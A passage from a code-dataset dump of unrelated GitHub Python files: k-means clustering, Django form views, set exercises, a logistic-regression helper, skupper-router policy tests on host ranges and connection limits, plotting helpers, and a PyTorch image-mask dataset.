grouped_lists.reset_index()\n df_result = grouped_lists.explode('test_name')\n grouped_lists.explode('test_name').to_csv(\"clusters.csv\")\n\n return df_result,kmeans\n\ndef plot_kmeans(df, kmeans):\n\n centroids = kmeans.cluster_centers_\n plt.scatter(centroids[:, 0], centroids[:, 1], c='red', s=50)\n plt.scatter(df['principal component 1'], df['principal component 2'], c= kmeans.labels_.astype(float), s=50, alpha=0.5)\n for i, label in enumerate(df['test_name']):\n plt.annotate(i, (df['principal component 1'][i], df['principal component 2'][i]))\n plt.xlabel(\"Component 1\")\n plt.ylabel(\"Component 2\")\n plt.grid()\n plt.show()\n\n\ndef main():\n\n FILE = \"pca.csv\"\n clusters = 2\n\n if len(sys.argv) > 1:\n FILE = sys.argv[1]\n clusters = int(sys.argv[2])\n\n df = pd.read_csv(FILE)\n df_result = kmean_cluster(df,clusters)\n print(df_result)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"VictorRodriguez/doctorado","sub_path":"detector/clustering/clustering.py","file_name":"clustering.py","file_ext":"py","file_size_in_byte":1641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"40537644334","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\nfrom django.db.models import Q\nfrom django.shortcuts import render, redirect\nfrom django.template import loader\nfrom .models import Student, Division\nfrom django.http import HttpResponse\nfrom .models import Student, Division, Teacher, Subject\nfrom .forms import studentForm, teacherform, divisionform, subjectform\n\n\ndef create_student(request):\n form = studentForm()\n if request.method == 'POST':\n form = studentForm(request.POST)\n if form.is_valid():\n form.save()\n return HttpResponse('
    Saved the student
    ')\n\n context = {\n 'form': form\n }\n return render(request, 'user/create.html', context)\n\n\ndef create_teacher(request):\n form = teacherform()\n if request.method == 'POST':\n form = teacherform(request.POST)\n if form.is_valid():\n form.save()\n\n context = {\n 'form': form\n }\n return render(request, 'user/teacher.html', context)\n\n\ndef create_division(request):\n form = divisionform()\n if request.method == 'POST':\n form = divisionform(request.POST)\n if form.is_valid():\n form.save()\n\n context = {\n 'form': form\n }\n return render(request, 'user/division.html', context)\n\n\ndef create_subject(request):\n form = subjectform()\n if request.method == 'POST':\n form = subjectform(request.POST)\n if form.is_valid():\n form.save()\n return HttpResponse('
    Saved...
    ')\n\n context = {\n 'form': form\n }\n return render(request, 'user/subject.html', context)\n\n\ndef student(request):\n obj = Student.objects.all()\n context = {\n 'obj': obj\n }\n return render(request, 'user/form.html', context)\n\n\ndef get_all_students(request):\n query = request.GET.get('q')\n print(query)\n results = Student.objects.filter(name=query)\n student_in_div = Student.objects.filter(division__name='3A')\n print(student_in_div)\n for result in results:\n stud_sub = Student.objects.filter(division__teacher__subject__name=result.division.teacher.subject.name)\n print(stud_sub)\n context = {\n 'results': results\n }\n return render(request, 'user/get.html', context)\n","repo_name":"Jishin4477/django-app","sub_path":"studentapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"8463367459","text":"'''\r\n\r\n>>> H = set(\"Hacker\")\r\n>>> R = set(\"Rank\")\r\n>>> H.update(R)\r\n>>> print H\r\nset(['a', 'c', 'e', 'H', 'k', 'n', 'r', 'R'])\r\n\r\n>>> H = set(\"Hacker\")\r\n>>> R = set(\"Rank\")\r\n>>> H.intersection_update(R)\r\n>>> print H\r\nset(['a', 'k'])\r\n\r\n>>> H = set(\"Hacker\")\r\n>>> R = set(\"Rank\")\r\n>>> H.difference_update(R)\r\n>>> print H\r\nset(['c', 'e', 'H', 'r'])\r\n\r\n>>> H = set(\"Hacker\")\r\n>>> R = set(\"Rank\")\r\n>>> H.symmetric_difference_update(R)\r\n>>> print H\r\nset(['c', 'e', 'H', 'n', 'r', 'R'])\r\n\r\n'''\r\n\r\nA = set()\r\n\r\nn = int(input('Enter Length of set A: '))\r\n\r\nfor i in range(n):\r\n inpt = int(input('Enter number in Set A: '))\r\n A.add(inpt)\r\n\r\nprint(A)\r\nN = int(input('Enter number of operations: '))\r\n\r\nfor op in range(N):\r\n S = set()\r\n oper = input('Enter name of operation {}: '.format(op+1))\r\n m = int(input('Enter Length of Set S: '))\r\n\r\n for i in range(m):\r\n inpt = int(input('Enter number in Set S: '))\r\n S.add(inpt)\r\n\r\n if oper == 'update':\r\n A.update(S)\r\n print('A:')\r\n print(A)\r\n elif oper == 'intersection_update':\r\n A.intersection_update(S)\r\n print('A:')\r\n print(A)\r\n elif oper == 'difference_update':\r\n A.difference_update(S)\r\n print('A:')\r\n print(A)\r\n elif oper == 'symmetric_difference_update':\r\n A.symmetric_difference_update(S)\r\n print('A:')\r\n print(A)\r\n","repo_name":"Raizadaaditya/Atom_Programs","sub_path":"set_update_operations.py","file_name":"set_update_operations.py","file_ext":"py","file_size_in_byte":1387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"28865893039","text":"import pandas as pd\nimport numpy as np\nfrom sklearn.linear_model import LogisticRegression\n\n# import numpy as np\n\n\nclass LinearModels:\n def __init__(self, verbose=False):\n self.verbose = verbose\n\n def define_clf(self, clf_type=\"lr\"):\n \"\"\"\n Define a logisitic regression model.\n\n Parameters\n ----------\n clf_type : str, optional\n _description_, by default \"lr\"\n\n Returns\n -------\n _type_\n _description_\n \"\"\"\n if clf_type == \"lr\":\n clf_lr = LogisticRegression()\n return clf_lr\n\n def logistic_regr(self, design_matrix, response):\n \"\"\"\n Fit a logistic regression model to data.\n\n Parameters\n ----------\n design_matrix : DataFrame\n _description_\n response : Vector\n the outcome of interest\n\n Returns\n -------\n Logistic Regression (sklearn)\n _description_\n \"\"\"\n clf_lr = self.define_clf()\n clf_lr.fit(X=design_matrix, y=response)\n return 
clf_lr\n\n def get_wgts(self, model_object):\n \"\"\"\n Generate bias and weights (coefficients) from a linear model.\n\n Parameters\n ----------\n model_object : Logistic Regression (sklearn)\n _description_\n\n Returns\n -------\n DataFrame\n _description_\n \"\"\"\n # intercept = model_object.intercept_\n bias = model_object.intercept_\n wgts = model_object.coef_\n bias_tbl = pd.DataFrame(bias, columns=[\"bias\"])\n wgts_tbl = pd.DataFrame(wgts, columns=model_object.feature_names_in_)\n\n return pd.concat([bias_tbl, wgts_tbl], axis=1)\n\n def make_random_sample_test(self, data_object, nbr_sample=2):\n tmp_sample = data_object.sample(n=nbr_sample).reset_index(drop=True)\n # tmp_sample_answer = tmp_sample[\"home_team_wins\"]\n return tmp_sample\n\n def make_inference(self, model_object, data_object):\n \"\"\"\n Produce estimates for data.\n\n Parameters\n ----------\n model_object : Logistic Regression (sklearn)\n _description_\n data_object : DataFrame or array-like object\n _description_\n\n Returns\n -------\n Dict\n Contains the following:\n 1. predicted class --> array\n 2. predicted probabilities --> array\n 3. standard deviation of the predicted probabilities --> array\n 4. absolute difference of the predicted probabilities --> array\n\n Notes\n -----\n Calculating and returning the standard deviation and absolute difference of the\n predicted probabilities allows for further understanding of the model's decision\n boundary.\n \"\"\"\n pred_cls = model_object.predict(data_object)\n pred_probs = model_object.predict_proba(data_object)\n\n std_diff = np.std(pred_probs, axis=1)\n abs_diff = np.abs(np.diff(pred_probs, axis=1))\n abs_diff = abs_diff.reshape(std_diff.shape)\n\n infer_dt = {\n \"pred_cls\": pred_cls,\n \"pred_probs\": pred_probs,\n \"std_diff\": std_diff,\n \"abs_diff\": abs_diff,\n }\n\n return infer_dt\n","repo_name":"jonathanharmitage/nflMatchupPredictor","sub_path":"nflMatchupPredictor/Models/LinearModels.py","file_name":"LinearModels.py","file_ext":"py","file_size_in_byte":3298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"19898455238","text":"import json\nfrom typing import TYPE_CHECKING, Any\n\nfrom skupper_router_internal.policy.policy_util import HostAddr, is_ipv6_enabled\nfrom skupper_router_internal.policy.policy_util import HostStruct\nfrom skupper_router_internal.policy.policy_util import PolicyError\nfrom skupper_router_internal.policy.policy_util import PolicyAppConnectionMgr\nfrom skupper_router_internal.policy.policy_local import PolicyLocal\n\nfrom system_test import unittest\nfrom system_test import TestCase, main_module\n\nif TYPE_CHECKING:\n from skupper_router_internal.policy.policy_local import AppStats\n\n\nclass PolicyHostAddrTest(TestCase):\n\n def expect_deny(self, badhostname, msg):\n denied = False\n try:\n xxx = HostStruct(badhostname)\n except PolicyError:\n denied = True\n self.assertTrue(denied, (\"%s\" % msg))\n\n def check_hostaddr_match(self, tHostAddr, tString, expectOk=True):\n # check that the string is a match for the addr\n # check that the internal struct version matches, too\n ha = HostStruct(tString)\n if expectOk:\n self.assertTrue(tHostAddr.match_str(tString))\n self.assertTrue(tHostAddr.match_bin(ha))\n else:\n self.assertFalse(tHostAddr.match_str(tString))\n self.assertFalse(tHostAddr.match_bin(ha))\n\n def test_policy_hostaddr_ipv4(self):\n # Create simple host and range\n aaa = HostAddr(\"192.168.1.1\")\n bbb = HostAddr(\"1.1.1.1,1.1.1.255\")\n # Verify host 
and range\n self.check_hostaddr_match(aaa, \"192.168.1.1\")\n self.check_hostaddr_match(aaa, \"1.1.1.1\", False)\n self.check_hostaddr_match(aaa, \"192.168.1.2\", False)\n self.check_hostaddr_match(bbb, \"1.1.1.1\")\n self.check_hostaddr_match(bbb, \"1.1.1.254\")\n self.check_hostaddr_match(bbb, \"1.1.1.0\", False)\n self.check_hostaddr_match(bbb, \"1.1.2.0\", False)\n\n def test_policy_hostaddr_ipv6(self):\n if not is_ipv6_enabled():\n self.skipTest(\"System IPv6 support is not available\")\n # Create simple host and range\n aaa = HostAddr(\"::1\")\n bbb = HostAddr(\"::1,::ffff\")\n ccc = HostAddr(\"ffff::0,ffff:ffff::0\")\n # Verify host and range\n self.check_hostaddr_match(aaa, \"::1\")\n self.check_hostaddr_match(aaa, \"::2\", False)\n self.check_hostaddr_match(aaa, \"ffff:ffff::0\", False)\n self.check_hostaddr_match(bbb, \"::1\")\n self.check_hostaddr_match(bbb, \"::fffe\")\n self.check_hostaddr_match(bbb, \"::1:0\", False)\n self.check_hostaddr_match(bbb, \"ffff::0\", False)\n self.check_hostaddr_match(ccc, \"ffff::1\")\n self.check_hostaddr_match(ccc, \"ffff:fffe:ffff:ffff::ffff\")\n self.check_hostaddr_match(ccc, \"ffff:ffff::1\", False)\n self.check_hostaddr_match(ccc, \"ffff:ffff:ffff:ffff::ffff\", False)\n\n def test_policy_hostaddr_ipv4_wildcard(self):\n aaa = HostAddr(\"*\")\n self.check_hostaddr_match(aaa, \"0.0.0.0\")\n self.check_hostaddr_match(aaa, \"127.0.0.1\")\n self.check_hostaddr_match(aaa, \"255.254.253.252\")\n\n def test_policy_hostaddr_ipv6_wildcard(self):\n if not is_ipv6_enabled():\n self.skipTest(\"System IPv6 support is not available\")\n aaa = HostAddr(\"*\")\n self.check_hostaddr_match(aaa, \"::0\")\n self.check_hostaddr_match(aaa, \"::1\")\n self.check_hostaddr_match(aaa, \"ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff\")\n\n def test_policy_malformed_hostaddr_ipv4(self):\n self.expect_deny(\"0.0.0.0.0\", \"Name or service not known\")\n self.expect_deny(\"1.1.1.1,2.2.2.2,3.3.3.3\", \"arg count\")\n self.expect_deny(\"9.9.9.9,8.8.8.8\", \"a > b\")\n\n def test_policy_malformed_hostaddr_ipv6(self):\n if not is_ipv6_enabled():\n self.skipTest(\"System IPv6 support is not available\")\n self.expect_deny(\"1::2::3\", \"Name or service not known\")\n self.expect_deny(\"::1,::2,::3\", \"arg count\")\n self.expect_deny(\"0:ff:0,0:fe:ffff:ffff::0\", \"a > b\")\n\n\nclass QpidDispatch:\n def qd_dispatch_policy_c_counts_alloc(self):\n return 100\n\n def qd_dispatch_policy_c_counts_refresh(self, cstats, entitymap):\n pass\n\n\nclass MockAgent:\n def __init__(self) -> None:\n self.qd = QpidDispatch()\n\n def add_implementation(self, entity: 'AppStats', cfg_obj_name: str) -> None:\n pass\n\n\nclass MockPolicyManager:\n def __init__(self):\n self.agent = MockAgent()\n self.logs = []\n\n def log_debug(self, text):\n print(\"DEBUG: %s\" % text)\n self.logs.append(text)\n\n def log_info(self, text):\n print(\"INFO: %s\" % text)\n self.logs.append(text)\n\n def log_trace(self, text):\n print(\"TRACE: %s\" % text)\n self.logs.append(text)\n\n def log_error(self, text):\n print(\"ERROR: %s\" % text)\n self.logs.append(text)\n\n def log_warning(self, text):\n print(\"WARNING: %s\" % text)\n self.logs.append(text)\n\n def get_agent(self):\n return self.agent\n\n\nclass PolicyFile(TestCase):\n\n manager: Any = MockPolicyManager()\n policy = PolicyLocal(manager)\n policy.test_load_config()\n\n def test_policy1_test_zeke_ok(self):\n p1 = PolicyFile.policy.lookup_user('zeke', '192.168.100.5', 'photoserver', '192.168.100.5:33333', 1)\n self.assertEqual(p1, 'test')\n upolicy = {}\n 
self.assertTrue(\n PolicyFile.policy.lookup_settings('photoserver', p1, upolicy)\n )\n self.assertTrue(upolicy['maxFrameSize'] == 444444)\n self.assertTrue(upolicy['maxMessageSize'] == 444444)\n self.assertTrue(upolicy['maxSessionWindow'] == 444444)\n self.assertTrue(upolicy['maxSessions'] == 4)\n self.assertTrue(upolicy['maxSenders'] == 44)\n self.assertTrue(upolicy['maxReceivers'] == 44)\n self.assertTrue(upolicy['allowAnonymousSender'])\n self.assertTrue(upolicy['allowDynamicSource'])\n self.assertTrue(upolicy['targets'] == 'a,private,')\n self.assertTrue(upolicy['sources'] == 'a,private,')\n\n def test_policy1_test_zeke_bad_IP(self):\n self.assertTrue(\n PolicyFile.policy.lookup_user('zeke', '10.18.0.1', 'photoserver', \"connid\", 2) == '')\n self.assertTrue(\n PolicyFile.policy.lookup_user('zeke', '72.135.2.9', 'photoserver', \"connid\", 3) == '')\n self.assertTrue(\n PolicyFile.policy.lookup_user('zeke', '127.0.0.1', 'photoserver', \"connid\", 4) == '')\n\n def test_policy1_test_zeke_bad_app(self):\n self.assertTrue(\n PolicyFile.policy.lookup_user('zeke', '192.168.100.5', 'galleria', \"connid\", 5) == '')\n\n def test_policy1_test_users_same_permissions(self):\n zname = PolicyFile.policy.lookup_user('zeke', '192.168.100.5', 'photoserver', '192.168.100.5:33333', 6)\n yname = PolicyFile.policy.lookup_user('ynot', '10.48.255.254', 'photoserver', '192.168.100.5:33334', 7)\n self.assertTrue(zname == yname)\n\n def test_policy1_lookup_unknown_application(self):\n upolicy = {}\n self.assertFalse(\n PolicyFile.policy.lookup_settings('unknown', 'doesntmatter', upolicy)\n )\n\n def test_policy1_lookup_unknown_usergroup(self):\n upolicy = {}\n self.assertFalse(\n PolicyFile.policy.lookup_settings('photoserver', 'unknown', upolicy)\n )\n\n\nclass PolicyFileApplicationFallback(TestCase):\n manager: Any = MockPolicyManager()\n policy = PolicyLocal(manager)\n policy.test_load_config()\n\n def test_bad_app_fallback(self):\n # Show that with no fallback the user cannot connect\n self.assertTrue(\n self.policy.lookup_user('zeke', '192.168.100.5', 'galleria', \"connid\", 5) == '')\n\n # Enable the fallback defaultVhost and show the same user can now connect\n self.policy.set_default_vhost('photoserver')\n settingsname = self.policy.lookup_user('zeke', '192.168.100.5', 'galleria', \"connid\", 5)\n self.assertTrue(settingsname == 'test')\n\n # Show that the fallback settings are returned\n upolicy = {}\n self.assertTrue(\n self.policy.lookup_settings('phony*app*name', settingsname, upolicy)\n )\n self.assertTrue(upolicy['maxFrameSize'] == 444444)\n self.assertTrue(upolicy['maxMessageSize'] == 444444)\n self.assertTrue(upolicy['maxSessionWindow'] == 444444)\n self.assertTrue(upolicy['maxSessions'] == 4)\n self.assertTrue(upolicy['maxSenders'] == 44)\n self.assertTrue(upolicy['maxReceivers'] == 44)\n self.assertTrue(upolicy['allowAnonymousSender'])\n self.assertTrue(upolicy['allowDynamicSource'])\n self.assertTrue(upolicy['targets'] == 'a,private,')\n self.assertTrue(upolicy['sources'] == 'a,private,')\n\n # Disable fallback and show failure again\n self.policy.set_default_vhost('')\n self.assertTrue(\n self.policy.lookup_user('zeke', '192.168.100.5', 'galleria', \"connid\", 5) == '')\n\n\nclass PolicyAppConnectionMgrTests(TestCase):\n\n def test_policy_app_conn_mgr_fail_by_total(self):\n stats = PolicyAppConnectionMgr(1, 2, 2)\n diags = []\n self.assertTrue(stats.can_connect('10.10.10.10:10000', 'chuck', '10.10.10.10', diags, None, None))\n self.assertFalse(stats.can_connect('10.10.10.10:10001', 'chuck', 
'10.10.10.10', diags, None, None))\n self.assertTrue(len(diags) == 1)\n self.assertIn('application connection limit', diags[0])\n\n def test_policy_app_conn_mgr_fail_by_user(self):\n stats = PolicyAppConnectionMgr(3, 1, 2)\n diags = []\n self.assertTrue(stats.can_connect('10.10.10.10:10000', 'chuck', '10.10.10.10', diags, None, None))\n self.assertFalse(stats.can_connect('10.10.10.10:10001', 'chuck', '10.10.10.10', diags, None, None))\n self.assertTrue(len(diags) == 1)\n self.assertIn('per user', diags[0])\n diags = []\n self.assertTrue(stats.can_connect('10.10.10.10:10002', 'chuck', '10.10.10.10', diags, 2, None))\n self.assertFalse(stats.can_connect('10.10.10.10:10003', 'chuck', '10.10.10.10', diags, 2, None))\n\n def test_policy_app_conn_mgr_fail_by_hosts(self):\n stats = PolicyAppConnectionMgr(3, 2, 1)\n diags = []\n self.assertTrue(stats.can_connect('10.10.10.10:10000', 'chuck', '10.10.10.10', diags, None, None))\n self.assertFalse(stats.can_connect('10.10.10.10:10001', 'chuck', '10.10.10.10', diags, None, None))\n self.assertTrue(len(diags) == 1)\n self.assertIn('per host', diags[0])\n diags = []\n self.assertTrue(stats.can_connect('10.10.10.10:10002', 'chuck', '10.10.10.10', diags, None, 2))\n self.assertFalse(stats.can_connect('10.10.10.10:10003', 'chuck', '10.10.10.10', diags, None, 2))\n\n def test_policy_app_conn_mgr_fail_by_user_hosts(self):\n stats = PolicyAppConnectionMgr(3, 1, 1)\n diags = []\n self.assertTrue(stats.can_connect('10.10.10.10:10000', 'chuck', '10.10.10.10', diags, None, None))\n self.assertFalse(stats.can_connect('10.10.10.10:10001', 'chuck', '10.10.10.10', diags, None, None))\n self.assertTrue(len(diags) == 2)\n success = 'per user' in diags[0] or 'per user' in diags[1]\n self.assertTrue(success)\n diags = []\n self.assertTrue(stats.can_connect('10.10.10.10:10002', 'chuck', '10.10.10.10', diags, 2, 2))\n self.assertFalse(stats.can_connect('10.10.10.10:10003', 'chuck', '10.10.10.10', diags, 2, 2))\n\n def test_policy_app_conn_mgr_update(self):\n stats = PolicyAppConnectionMgr(3, 1, 2)\n diags = []\n self.assertTrue(stats.can_connect('10.10.10.10:10000', 'chuck', '10.10.10.10', diags, None, None))\n self.assertFalse(stats.can_connect('10.10.10.10:10001', 'chuck', '10.10.10.10', diags, None, None))\n self.assertTrue(len(diags) == 1)\n self.assertIn('per user', diags[0])\n diags = []\n stats.update(3, 2, 2)\n self.assertTrue(stats.can_connect('10.10.10.10:10001', 'chuck', '10.10.10.10', diags, None, None))\n\n def test_policy_app_conn_mgr_disconnect(self):\n stats = PolicyAppConnectionMgr(3, 1, 2)\n diags = []\n self.assertTrue(stats.can_connect('10.10.10.10:10000', 'chuck', '10.10.10.10', diags, None, None))\n self.assertFalse(stats.can_connect('10.10.10.10:10001', 'chuck', '10.10.10.10', diags, None, None))\n self.assertTrue(len(diags) == 1)\n self.assertIn('per user', diags[0])\n diags = []\n stats.disconnect(\"10.10.10.10:10000\", 'chuck', '10.10.10.10')\n self.assertTrue(stats.can_connect('10.10.10.10:10001', 'chuck', '10.10.10.10', diags, None, None))\n\n def test_policy_app_conn_mgr_create_bad_settings(self):\n denied = False\n try:\n stats = PolicyAppConnectionMgr(-3, 1, 2)\n except PolicyError:\n denied = True\n self.assertTrue(denied, \"Failed to detect negative setting value.\")\n\n def test_policy_app_conn_mgr_update_bad_settings(self):\n denied = False\n try:\n stats = PolicyAppConnectionMgr(0, 0, 0)\n except PolicyError:\n denied = True\n self.assertFalse(denied, \"Should allow all zeros.\")\n try:\n stats.update(0, -1, 0)\n except PolicyError:\n 
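# expected path: update() validates its arguments like the constructor does,\n            # so the negative value must raise PolicyError\n            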
denied = True\n self.assertTrue(denied, \"Failed to detect negative setting value.\")\n\n def test_policy_app_conn_mgr_larger_counts(self):\n stats = PolicyAppConnectionMgr(10000, 10000, 10000)\n diags = []\n for i in range(0, 10000):\n self.assertTrue(stats.can_connect('1.1.1.1:' + str(i), 'chuck', '1.1.1.1', diags, None, None))\n self.assertTrue(len(diags) == 0)\n self.assertFalse(stats.can_connect('1.1.1.1:10000', 'chuck', '1.1.1.1', diags, None, None))\n self.assertTrue(len(diags) == 3)\n self.assertTrue(stats.connections_active == 10000)\n self.assertTrue(stats.connections_approved == 10000)\n self.assertTrue(stats.connections_denied == 1)\n\n\nclass PolicyAliases(TestCase):\n\n #\n def test_AliasesRenameOwnVhost(self):\n config_str = \"\"\"\n[{\n \"hostname\": \"$default\",\n \"allowUnknownUser\": true,\n \"aliases\": \"$default\",\n \"groups\": {\n \"$default\": {\n \"remoteHosts\": \"*\",\n \"allowDynamicSource\": true,\n \"allowAnonymousSender\": true,\n \"sources\": \"$management, examples, q1\",\n \"targets\": \"$management, examples, q1\",\n \"maxSessions\": 1\n }\n }\n}]\n\"\"\"\n manager: Any = MockPolicyManager()\n policy = PolicyLocal(manager)\n ruleset = json.loads(config_str)\n denied = False\n try:\n policy.create_ruleset(ruleset[0])\n except PolicyError:\n denied = True\n self.assertTrue(denied, \"Ruleset duplicates vhost and alias but condition not detected.\")\n\n #\n def test_SameAliasOnTwoVhosts(self):\n config_str = \"\"\"\n[{\n \"hostname\": \"$default\",\n \"aliases\": \"a,b,c,d,e\",\n \"groups\": {\n \"$default\": {\n \"maxSessions\": 1\n }\n }\n},\n{\n \"hostname\": \"doshormigas\",\n \"aliases\": \"i,h,g,f,e\",\n \"groups\": {\n \"$default\": {\n \"maxSessions\": 1\n }\n }\n}]\n\"\"\"\n manager: Any = MockPolicyManager()\n policy = PolicyLocal(manager)\n ruleset = json.loads(config_str)\n denied = False\n try:\n policy.create_ruleset(ruleset[0])\n policy.create_ruleset(ruleset[1])\n except PolicyError as e:\n denied = True\n self.assertTrue(denied, \"Rulesets duplicate same alias in two vhosts but condition not detected.\")\n\n #\n def test_AliasConflictsWithVhost(self):\n config_str = \"\"\"\n[{\n \"hostname\": \"$default\",\n \"groups\": {\n \"$default\": {\n \"maxSessions\": 1\n }\n }\n},\n{\n \"hostname\": \"conflict-with-vhost\",\n \"aliases\": \"$default\",\n \"groups\": {\n \"$default\": {\n \"maxSessions\": 1\n }\n }\n}]\n\"\"\"\n manager: Any = MockPolicyManager()\n policy = PolicyLocal(manager)\n ruleset = json.loads(config_str)\n denied = False\n try:\n policy.create_ruleset(ruleset[0])\n policy.create_ruleset(ruleset[1])\n except PolicyError as e:\n denied = True\n self.assertTrue(denied, \"Ruleset alias names other vhost but condition not detected.\")\n\n #\n def test_AliasOperationalLookup(self):\n manager: Any = MockPolicyManager()\n policy = PolicyLocal(manager)\n policy.test_load_config()\n\n # For this test the test config defines vhost 'photoserver'.\n # This test accesses that vhost using the alias name 'antialias'.\n settingsname = policy.lookup_user('zeke', '192.168.100.5', 'antialias', \"connid\", 5)\n self.assertTrue(settingsname == 'test')\n\n upolicy = {}\n self.assertTrue(\n policy.lookup_settings('antialias', settingsname, upolicy)\n )\n self.assertTrue(upolicy['maxFrameSize'] == 444444)\n self.assertTrue(upolicy['sources'] == 'a,private,')\n\n\nif __name__ == '__main__':\n 
unittest.main(main_module())\n","repo_name":"skupperproject/skupper-router","sub_path":"tests/router_policy_test.py","file_name":"router_policy_test.py","file_ext":"py","file_size_in_byte":17174,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"32"} {"seq_id":"35866152579","text":"import seaborn as sns\nimport matplotlib.pyplot as plt\nfrom typing import List, Tuple, Any, Counter as CounterT\nfrom collections import Counter\nimport toolz.curried as toolz\n\nfrom src.parsing.songs import parse_tracks\nfrom src.IO.genre_io import all_genres\n\n\ndef plot_years(counter: CounterT[int]) -> None:\n    breakdown = {\n        \"Year\": list(counter.keys()),\n        \"Number of songs\": list(counter.values()),\n    }\n\n    sns.set_theme()\n    axes = sns.barplot(\n        data=breakdown,\n        x=\"Year\",\n        y=\"Number of songs\",\n    )\n    axes.set_title(\"Songs per year\")\n    plt.show()\n\n\n# Show a bar plot of the number of tracks added to the playlist per year\nplot_songs_per_year = toolz.compose(\n    plot_years, Counter, list, parse_tracks)\n\n\n@toolz.curry\ndef occurs_more_than(min: int, counter: Counter) -> dict:\n    return toolz.valfilter(lambda x: x > min, counter)\n\n\ndef sort_counter(counter: Counter) -> List[Tuple[Any, int]]:\n    return sorted(counter.items(), key=lambda pair: pair[1], reverse=True)\n\n\ndef plot_genres(sorted_counter: List[Tuple[str, int]]) -> None:\n    breakdown = {\n        \"Genre\": list(map(toolz.get(0), sorted_counter)),\n        \"Occurrences\": list(map(toolz.get(1), sorted_counter)),\n    }\n    sns.set_theme()\n    axes = sns.barplot(\n        data=breakdown,\n        x=\"Genre\",\n        y=\"Occurrences\",\n    )\n    axes.set_title(\"Most common genres\")\n    plt.show()\n\n\n# Show a bar plot of the number of songs per genre in the playlist\nplot_songs_per_genre = toolz.compose(\n    plot_genres,\n    sort_counter,\n    occurs_more_than(10),\n    Counter,\n    list\n)\n","repo_name":"SMC242/spotify-wrapped-playlist","sub_path":"src/formatting/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":1592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} {"seq_id":"70411709533","text":"from torch.utils.data import Dataset\nfrom torchvision.transforms.transforms import ToTensor\nimport torch\n\nimport albumentations as A\n\nimport numpy as np\n\nfrom PIL import Image\nimport cv2 as cv\n\nfrom typing import Dict, Optional, Union, List\nimport os\nimport json\n\nimport logging\n\nfrom .aug_tools import *\n\n__all__ = [\n    \"cfg2datasets\",\n    \"ImgMaskSet\",\n    \"datasets2json_file\"\n]\n\n# Dataset utilities: build datasets from configs and dump their image lists.\n\nlog = logging.getLogger(__name__)\nimg2tensor = ToTensor()\n\n\nclass ImgMaskSet(Dataset):\n    \"\"\"\n    Dataset that returns images, their masks and their names; it can also return the untransformed image.\n    In the img and mask dirs, an image and its corresponding mask must share the same file name.\n    The fgr and bgr transforms must not change the mask (they cannot include a flip, for instance).\n    \"\"\"\n    def __init__(self, log_name: str, img_dir_path: str, mask_dir_path: str, img_list: List[str],\n                 bgr_trfm, fgr_trfm, trfm, preproc,  # add type of augmentation\n                 device: torch.device,):\n        \"\"\"\n        :param log_name: name that is used in log\n\n        :param img_dir_path: path to directory where images are contained. 
in this directory all images are .jpeg\n :param mask_dir_path: path to directory where masks (images with deleted background) are contained.\n in this directory all images are .png\n :param img_list: specifies image names in image directory that should be used\n\n :param bgr_trfm: transformation of background, is not used during the test\n :param fgr_trfm: foreground augmentations, is not used during the test\n :param trfm: transformations to augment dataset, is not used during the test\n :param preproc: transformations that used during the test, it is applied after all other transformations\n\n :param device: device of images and masks\n \"\"\"\n\n self.log_name = log_name\n\n self.img_dir_path = img_dir_path\n self.mask_dir_path = mask_dir_path\n self.device = device\n\n self.img_list = [i[:-5] for i in img_list] # deleted extension .jpeg\n self.size = len(self.img_list)\n\n # augmentation\n self.bgr_trfm = bgr_trfm\n self.fgr_trfm = fgr_trfm\n self.trfm = trfm\n self.aug_flag = True # applying of augmentation depends on it\n\n # preprocessing\n self.preproc = preproc\n self.preproc_flag = True # applying of preprocessing depends on it\n\n # needed to return img in it original form, without preproc and augmentation\n self.return_original_img = False\n\n log.info(f\"Created {self.log_name} dataset: \\n\"\n f\"Size: {self.size} \\n\"\n f\"Device: {self.device} \\n\"\n f\"Path to image dir: {self.img_dir_path} \\n\"\n f\"Path to mask dir: {self.mask_dir_path}\")\n\n def __len__(self):\n return self.size\n\n def __getitem__(self, idx: int):\n\n img_name = self.img_list[idx]\n img_path = os.path.join(self.img_dir_path, img_name + \".jpeg\")\n mask_path = os.path.join(self.mask_dir_path, img_name + \".png\")\n\n # read img and mask\n original_img = cv.imread(img_path)\n if original_img is None:\n msg = f\"Wrong reading image {img_path}\"\n log.critical(msg)\n raise Exception(msg)\n\n original_img = cv.cvtColor(original_img, cv.COLOR_BGR2RGB) # convert to RGB format\n img = original_img.copy()\n\n with Image.open(mask_path) as mask_im:\n mask = np.array(mask_im.split()[-1]) # retrieve transparent mask\n\n # apply transformations\n if self.aug_flag:\n img, mask = self.apply_aug(img, mask)\n if self.preproc_flag:\n img, mask = self.apply_preproc(img, mask)\n\n # convert to tensor and transfer to device\n img_tensor = img2tensor(img).to(torch.float32).to(self.device)\n mask_tensor = img2tensor(mask).to(torch.float32).to(self.device)\n\n # return original image if it's needed\n if self.return_original_img:\n original_img = img2tensor(original_img).to(self.device)\n return img_name, img_tensor, mask_tensor, original_img\n else:\n return img_name, img_tensor, mask_tensor\n\n def apply_aug(self, img, mask):\n trfmd_bgr = self.bgr_trfm(image=img, mask=mask)[\"image\"]\n trfmd_fgr = self.fgr_trfm(image=img, mask=mask)[\"image\"]\n mask = mask.reshape([330, 330, 1])\n img = (trfmd_fgr * mask + trfmd_bgr * (1 - mask)).astype(\"uint8\")\n\n augmented = self.trfm(image=img, mask=mask)\n return augmented[\"image\"], augmented[\"mask\"]\n\n def apply_preproc(self, img, mask):\n preprocessed = self.preproc(image=img, mask=mask)\n return preprocessed[\"image\"], preprocessed[\"mask\"]\n\n def get_img_list(self):\n return [f\"{i}.jpeg\" for i in self.img_list]\n\n def img_list2file(self, path: str):\n with open(os.path.join(path, f\"{self.log_name}_dataset.json\"), \"w\") as fp:\n json.dump(\n {\n 